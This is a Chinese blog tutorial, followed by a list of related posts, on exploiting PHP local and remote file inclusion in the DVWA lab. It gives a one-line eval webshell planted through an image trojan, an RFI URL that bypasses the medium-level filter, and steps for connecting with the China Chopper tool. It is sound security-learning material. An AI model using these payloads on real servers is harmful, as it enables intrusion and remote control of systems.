文件包含渗透File inclusion 本地文件和远程文件包含+webshell(网络安全学习11)

最新推荐文章于 2024-03-07 09:45:04 发布
最新推荐文章于 2024-03-07 09:45:04 发布
阅读量3.7k 收藏 9
点赞数 2
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/until_u/article/details/107120472
版权

CONTENTS

 

1 文件包含渗透简述

1.1 原理和危害

1.2 实验模拟环境

2 低安全级别渗透

2.1 本地文件包含

2.2 本地文件包含+webshell

2.3 远程文件包含+webshell

3 中安全级别渗透

3.1 本地文件包含

3.2 本地文件包含+webshell

3.3 远程文件包含+webshell

4 高安全级别渗透

1 文件包含渗透简述

1.1 原理和危害

文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数( include() , require()和include_once(),require_once() )利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。

文件包含漏洞分为本地文件包含漏洞远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项 (选项开启之后,服务器允许包含一个远程的文件)。服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到自己的目的。

  1. 文件包含( File Inclusion )即程序通过[包含函数]调用本地或远程文件,以此来实现拓展功能
  2. 被包含的文件可以是各种文件格式,而当文件里面包含恶意代码,则会形成远程命令执行或文件上传漏洞
  3. 文件包含漏洞主要发生在有包含语句的环境中,例如PHP所具备include、require等包含函数


       文件包含分为两类:

  • 本地文件包含LFI ( Local File Inclusion )当被包含的文件在服务 器本地时,就形成本地文件包含;
  • 远程文件包含RFI ( Remote File Inclusion) 当被包含的文件在第3 方服务器时,叫做远程文件包含。

 

看下图理解:

 

1.2 实验模拟环境

模拟本地文件包含两台虚拟机就足够了,远程文件包含可以设置三台来模拟。ip地址不一定与下面一致哦。

2 低安全级别渗透

2.1 本地文件包含

(1)首先在肉鸡owasp上查看/etc/php5/cli/php.ini文件,观察下面这两个有没有打开。

(2)打开owasp网址,进入dvwa。找到File inclusion。查看源码。这是一种low安全级。

(3)直接在搜索栏后面添加服务器中对应的文件地址,就可以访问。前提有相应的权限。

 

2.2 本地文件包含+webshell

(1)本地文件包含获取权限实在太少了,还有限制。我们可以通过制作一句图片木马,上传图片木马文件到服务器,执行文件而生成后门。最后通过中国菜刀工具连接webshell。

我们先制作一句话图片木马,利用edjpgcom这个工具生成。工具链接给大家:

链接:https://pan.baidu.com/s/1f4FmSMiJstAE7U-XT6ejgQ 
提取码:ypfs 

直接将图片拖到exe中,编辑内容如下: 

<?fputs(fopen("shell1.php","w"),'<?php eval($_POST[passwd]);?>')?>

(2)开始上传一句话图片木马

(3) 执行文件生成后门

(4)利用菜刀工具登录到webshell

 实现对文件管理、虚拟终端和数据库管理的控制:

 

2.3 远程文件包含+webshell

这个其实也很简单,我就在远程服务器配置一个脚本文件。例如我在kali配置Apache服务器,在主目录下放一个jpg文件,jpg里放一句话木马,然后通过win7访问远程文件的URL。

(1)在kali上配置Apache,并上传文件到网站上。

<?fputs(fopen("shell2.php","w"),'<?php eval($_POST[passwd2]);?>')?>

(2)肉鸡端访问利用文件包含访问远程服务器后门文件

查看owasp下面目录下是否生成shell2.php 

(3)开始利用菜刀工具(这个我就不在赘述拉)

 

3 中安全级别渗透

3.1 本地文件包含

(1)首先调整安全级别为medium,然后查看后端代码,如下。说明它不允许URL远程连接。但仍然是可以进行本地文件包含的。这个我就不演示拉。跟上面low安全级别一样。

 

 

3.2 本地文件包含+webshell

依然先上传带有木马的图片,执行程序,获取服务器的webshell。跟low级别操作一样

 

然后就可以通过菜刀工具获取webshell拉(我就不演示了)

3.3 远程文件包含+webshell

因为后端代码对http头做了限制,但是仍然可以通过伪造http头,str_replace仍然轻松绕过:如下:

http://192.168.119.167/dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.119.166/noface.jpg

下面又可以通过菜刀工具来获取webshell了。 

4 高安全级别渗透

这个是很安全的,因为它对包含文件写死了,不允许其它include文件包含进来。这种代码优势就是很安全,劣势也很明显,完全闭关锁国。可以看下面后端代码:

 

 

 

 

 

 

 

 

 

硬核的无脸man~
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[web安全-文件包含漏洞解析] 第一次有人把文件包含漏洞讲的通俗易懂及DVWA文件上传靶场的解题过程
m0_73033023的博客
04-21 633
了解文件包含是什么 文件包含漏洞(File Inclusion)是一种最常见的依赖于脚本运行而影响 Web 应用程序的漏洞。当应用程序使用攻击者控制的变量建立一个可执行代码的路径,允许攻击者控制在运行时执行哪个文件时,就会导致文件包含漏洞。 程序开发人员通常会把可重复使用的函数写入单个文件中,在使用这些函数时,程序开发人员直接调用此文件,而无需再次编写函数,这种调用文件的过程一般被称为文件包含。此外,程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。但正是由于这种灵活性,
本地文件包含远程文件包含(超详细,小白也彳亍!)
热门推荐
qq_45300786的博客
09-22 1万+
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不..
获取webshell的十种方法
最新发布
2301_76786857的博客
03-07 1166
黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。
文件包含漏洞拿webshell
weixin_51692662的博客
08-20 756
文件包含漏洞拿webshell
本第包含与远程包含--学习
weixin_46865273的博客
05-19 646
1、什么是文件包含 用一句话来说就是,文件包含不下雨漏洞,当时由于对包含进行的文件不可控,导致了文件包含漏洞的产生 文件包含分为两种 1、本地文件包含LFI (包含本地文件操控LFI) 2、远程文件包含RFI (需要添加默认php是不开启远程文件包含 开启需要配置allow_url_include = On 通过SMB也可以绕过 文件包含的函数 include(‘1.txt’) 加载某个文件内容当作php代码进行执行,它不在意后缀任何文件都可以包含,包括图片码 php运行到inclu
Web安全-文件包含漏洞
11-04
文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用黑客控制的变量构建可执行代码的路径时,文件包含漏洞会导致黑客任意控制运行时执行的文件。      文件包含漏洞分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。这种漏洞貌不惊人,却危害很大。通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解。若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制。另外不管是本地文件包含还是远程文件包含文件包含漏洞还可能导致执行任意代码。      本节课程通过代码讲解文件包含漏洞的实战,深入理解文件包含漏洞的原理。
toxin:LFI(本地文件包含)漏洞利用工具
05-30
注册新的恶意全局变量后,我们可以将其添加到 URL 中的查询字符串中,该 URL 包含目标主机上容易被包含的文件,然后使用该文件和查询字符串执行任意系统级命令,像这样: ...
FDsploit:文件包含和目录遍历模糊,枚举和利用工具
05-03
文件包含和目录遍历的模糊,枚举和利用工具。 FDsploit菜单: $ python fdsploit.py -h _____ ____ _ _ _ | __| \ ___ ___| |___|_| |_ | __| | |_ -| . | | . | | _| |__| |____/|___| _|_|___|_|_| |_|......
DIFileFinder v6.7.0 for D4-XE10.1 文件搜索
08-22
DIFileFinder is collection of Delphi components to search the file system for files and or folders matching (or not matching) particular attributes and / or name patterns. Pattern syntax includes ...
Skills Assessment - File Inclusion Write Up.pdf
07-21
Hack The Box - File Inclusion Module详细讲解中文教程-实战训练解析
Remote-File-Inclusion-Attacks.rar_网络编程_Unix_Linux_
08-11
this doc talk about how to attack a network system remotly very good document in how to learn hackers mechanism and protect your networks againts hacking
DAY13:文件上传漏洞
qq_49433473的博客
07-25 907
文件上传漏洞 修复方法 黑名单白名单特殊绕过
本地文件包含远程文件包含漏洞
weixin_41554088的博客
05-04 1749
总结一下 1.文件包含漏洞分两种:LFI(local file include)本地文件包含 和 RFI(remote file include)远程文件包含 2.文件包含常用到的函数:include() 和 require() 3.特性:文件包含读取文件内容后,会将其当做php执行,所以在文件包含时,后缀是什么已经不重要了 4.RFI需要满足满足三个条件:1.需要allow_url_include=On(默认为off) 2.你的木马不存在目标主机上 3.要包含的远程地址一般都是txt 这里拿ph
Web安全 文件包含漏洞 (直接拿到 服务器 的最高权限)
网络安全领域___专研者.
02-12 4593
文件包含的漏洞的概括:文件包含的漏洞是 程序员在开发网站的时候,为了方便自己开发构架,使用了一些包含的函数(比如:php开发语言,include() , include_once() , require_once() ... ),而且包含函数中的变量,没有做一些过滤或者限制,使得用户可以 控制传到服务器中的数据,导致文件包含漏洞。 文件包含漏洞的执行规则:文件包含漏洞可以怎么理解,就是一个 A 文件包含着另一个 B 文件,将包含着 B 文件里面的内容,以这个网站的脚本代码 去
本地文件包含之包含日志获取webshell
WYJ____的博客
08-06 3340
预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 学会包含日志获取webshell 实验工具 浏览器 实验环境 客户机一台 实验步骤 1、访问127.0.0.1/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。 2.浏览器设置代理服务的步骤...
文件包含webshell
椰树ii
04-30 3740
本实验的目的:如何在杀软软件防范下绕过检测上传大马。    新建一个记事本,内容为 命名为:1.asp 将我们的大马.asp改名为:123.jpg            将上述的1.asp和123.jpg上传到菜刀里 接下来,访问1.asp OK,成功执行大马。 注:这段代码意思是包含一个文件,名为:123.jpg。当我们访问1.asp的时候,123.
php远程包含木马,远程文件包含webshell
weixin_32407355的博客
03-19 411
PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。(allow_url_fopen = On 是否允许打开远程文件allow_url_include = On 是否允许include/require远程文件)注意:如果是包含远程服务器上的PHP...
php文件包含getshell
Jiajiajiang_的博客
07-11 5541
今天面试被问到这个了,已经是很久以前用到了,脑子一时短路,一点也想不起来,今天想捋一遍 参考 文件包含是应用程序(在这里就是指php函数引入文件时)未对要引用的文件做合理的校验,从而恶意的使应用程序操作了意料之外的文件,将会导致文件泄露,更有甚者会导致恶意代码的注入。 先介绍一下本地文件包含LFI(Local File Include) 举个最简单的例子,新建一个php文件,命...
LFI(本地文件包含)获取Webshell
weixin_30734435的博客
10-11 439
本地文件包含Web渗透测试中时不时的会遇到。之前遇到本地文件包含的时候,最多就是证明一下:比如包含“/etc/passwd”。有利用本地文件包含来进行Getshell的,之前是略有耳闻的,这两天看相关文章的时候,好奇一下自己搭环境实现了一遍。很老的技术了,看老外在2011年就写了相关文章,不过文章中的Python程序是有问题的。我会在最后把自己修改的代码分享出来。 ...
dvwa靶场远程文件包含
09-07
DVWA靶场中的远程文件包含(Remote File Inclusion)漏洞是指当服务器开启allow_url_include选项时,可以通过利用PHP的特性函数(include(),require(),include_once()和require_once())以URL的形式动态包含文件,如果没有对文件来源进行严格审查,就会导致任意文件读取或任意命令执行的安全漏洞。 对于DVWA靶场中的远程文件包含漏洞,可以采取以下措施进行修复和防护: 1. 设置白名单:在文件包含过程中,可以设置白名单,对传入的参数进行比较,只允许包含合法的文件。 2. 过滤危险字符:由于Include/Require函数可以对PHP Wrapper形式的地址进行包含执行,需要判断文件名是否为合法的PHP文件,避免目录绕过漏洞。 3. 限制文件目录:通过设置PHP配置文件中的open_basedir选项,只允许在指定目录内搜索文件,限制文件包含的范围。 4. 关闭危险配置:关闭PHP配置中的allow_url_include选项,避免远程文件的不可信任性和不确定性,以及远程代码执行的风险。 通过以上措施,可以有效修复和防护DVWA靶场中的远程文件包含漏洞,提高系统的安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

硬核的无脸man~

你的鼓励是我创作的最大功力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值